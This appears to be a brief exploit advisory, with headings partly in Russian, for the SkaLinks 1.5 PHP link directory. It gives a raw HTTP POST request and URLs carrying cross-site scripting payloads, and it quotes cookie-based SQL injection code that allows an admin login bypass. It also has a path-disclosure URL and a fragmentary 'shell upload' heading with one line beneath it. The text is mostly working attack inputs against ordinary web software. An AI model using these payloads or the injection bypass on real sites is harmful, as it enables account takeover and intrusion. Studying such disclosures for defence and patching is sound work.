Cross Site Scripting
POST /vuln/skalinks_1_5/add_url.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Host: 127.0.0.1 User-Agent: Mozilla/4.0 Content-Length: 288 Connection: Close link_url="><script>alert()</script>&link_title=test&link_description=test&link_full_description=testtest&link_email=mail@address.com&cat=1&Form_submitted=Submit%20Link&letter_id=4
link_full_description=</textarea><script>alert()</script>
SQL-injection, Bypass
function IsAdmin( ) { $table_name = $this->m_AdminsTable; $res = $this->db_Row( "SELECT * FROM `$table_name` WHERE `Name`='".$_COOKIE['adminname']."' AND `Password`='".$_COOKIE['pwd']."'"); if ( !$res ) { return 0; } else { return $res; } }
Cross Site Scripting in URI
http://127.0.0.1/vuln/skalinks_1_5/admin/index.php/>"><script>alert()</script> http://127.0.0.1//vuln/skalinks_1_5/admin/register.php/>"><script>alert()</script> http://127.0.0.1/vuln/skalinks_1_5/vuln/skalinks_1_5/search.php/>"><script>alert()</script>
Способ заливки шелла
allow from all
Раскрытие путей
http://127.0.0.1/vuln/skalinks_1_5/search.php?url=test&Search=Search&search_type=URL